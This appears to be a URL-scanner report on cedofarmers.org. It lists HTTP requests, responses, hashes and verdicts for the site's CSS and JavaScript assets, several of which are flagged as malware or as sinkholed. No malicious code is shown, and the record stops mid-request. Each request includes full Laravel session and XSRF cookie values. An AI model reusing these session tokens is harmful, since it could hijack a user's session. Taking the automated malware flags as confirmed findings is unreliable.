quad9 Sinkholed
GET /css/animate.css HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 7310
content-type: text/css
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/css/aos.css
192.185.57.117200 OK 2.2 kB URL HTTP/2 cedofarmers.org/css/aos.css
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type ASCII text, with very long lines (25948)
Hash 42e52dc8ebb4e86a83acbe2e3a433a2d
c102f5a5756bd293cfbd890706560f924a8b2dad
3430e9404526e3626b63dbde1ee828089ef07bb73852df0eadff5f403d078762
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /css/aos.css HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 2196
content-type: text/css
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/css/ionicons.min.css
192.185.57.117200 OK 8.9 kB URL HTTP/2 cedofarmers.org/css/ionicons.min.css
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type Unicode text, UTF-8 text, with very long lines (46353)
Hash 30e1e5b3be98130dc13f66e3d5d4a4dd
16945c3b91fe3b7e84c83789c3a7158be4cf3f9c
e4979dc06bca7b944980d478d583e27d530931eb6e9f560822ad3049cfc70643
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /css/ionicons.min.css HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 8872
content-type: text/css
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/css/bootstrap-datepicker.css
192.185.57.117200 OK 3.6 kB URL HTTP/2 cedofarmers.org/css/bootstrap-datepicker.css
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Hash 14373813f111ee36904a15a3b750b0c9
2b0edd4a5bd61060da384d04424f83e2dd644c56
90e8499185ca0fd4d32fb2088117f7b9ce4e399b7d876070c3669b0c64ac4404
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /css/bootstrap-datepicker.css HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 3576
content-type: text/css
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/css/flaticon.css
192.185.57.117200 OK 466 B URL HTTP/2 cedofarmers.org/css/flaticon.css
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Hash 745c2e66a7681f81fecd0399f16054e0
d36db54699951ea73000ece2604a5c1f1ee4d932
5f9c839e836adefc596f4a675ab9b59f49f6d13c0670e11eb18bbf44841bb41d
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /css/flaticon.css HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 466
content-type: text/css
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/css/jquery.timepicker.css
192.185.57.117200 OK 456 B URL HTTP/2 cedofarmers.org/css/jquery.timepicker.css
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Hash c310f69ed9a3cd6ce699c5df769a7e28
dec2efbf8cbf89cecfece91877b361f23356dd57
edd2492f889f995428231e2c07a819831840294fef6a9d59cea7e54c8932dff2
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /css/jquery.timepicker.css HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 456
content-type: text/css
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/js/popper.min.js
192.185.57.117200 OK 8.1 kB URL HTTP/2 cedofarmers.org/js/popper.min.js
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type ASCII text, with very long lines (18860)
Hash 5996341f0746435a8fa35e664d9d66a4
29f2b76dad23c3dd64a8a86924bbb8e1b6dc8782
0bcca1c908b2eaf5de34371c31e7976e95f4b38e09764be3ce6330df72d6be3c
Analyzer Verdict Alert fortinet Malware
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /js/popper.min.js HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 8080
content-type: application/javascript
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/css/icomoon.css
192.185.57.117200 OK 14 kB URL HTTP/2 cedofarmers.org/css/icomoon.css
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Hash 7a704ee33ed7777f856bd19a6d54c133
1706b2c62d08a8b48d71e6e46e9cc18e03d9f040
0089a5b5cd9f1d273312b6a6a73ab075e0a28a2d1b11681570ce39d5286837eb
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /css/icomoon.css HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 13989
content-type: text/css
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/js/jquery-migrate-3.0.1.min.js
192.185.57.117200 OK 3.9 kB URL HTTP/2 cedofarmers.org/js/jquery-migrate-3.0.1.min.js
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Hash 5eb86a89a29cbbdf4c50ed77ecdbea34
e0f8e06212fb706648209755fab270b7ba804caa
072d17e2f98fa8124dda17d0e874f4e9225164193ac304fd29a489e35f57d051
Analyzer Verdict Alert fortinet Malware
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /js/jquery-migrate-3.0.1.min.js HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 3888
content-type: application/javascript
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/js/jquery.stellar.min.js
192.185.57.117200 OK 4.1 kB URL HTTP/2 cedofarmers.org/js/jquery.stellar.min.js
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type ASCII text, with very long lines (12453)
Hash 3525f2201b4f09032255aa580b5ffb6f
00b2c0b860cdc0a4d466575d57b6f3d9b748decc
700f7e51cd1033335fd0dff2838e02e9cbf3fd206eb4635de5fd07ccaa92dfaa
Analyzer Verdict Alert fortinet Malware
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /js/jquery.stellar.min.js HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 4109
content-type: application/javascript
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/js/jquery.waypoints.min.js
192.185.57.117200 OK 3.2 kB URL HTTP/2 cedofarmers.org/js/jquery.waypoints.min.js
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type Unicode text, UTF-8 text, with very long lines (8668)
Hash fb0f2e418324ef4b2ccef62b8460160d
9e1a7fd820cb33d4cbf8620dfa28e284fdfc6a8e
d458a5bdf76d7529e89e204b4d6de5d4c36d25f78e4e5ad1db0b6aef4f53851b
Analyzer Verdict Alert fortinet Malware
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /js/jquery.waypoints.min.js HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 3151
content-type: application/javascript
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/js/aos.js
192.185.57.117200 OK 6.8 kB URL HTTP/2 cedofarmers.org/js/aos.js
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type ASCII text, with very long lines (14212)
Hash 479cdf80b809326d4db924af9c776aed
19a6c5f3d7d22dabc779ca8211c9b77e46be2ba6
c297112630880d8480a1659d77b2a72afc346de97dab6826bda00903732b7da7
Analyzer Verdict Alert fortinet Malware
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /js/aos.js HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; 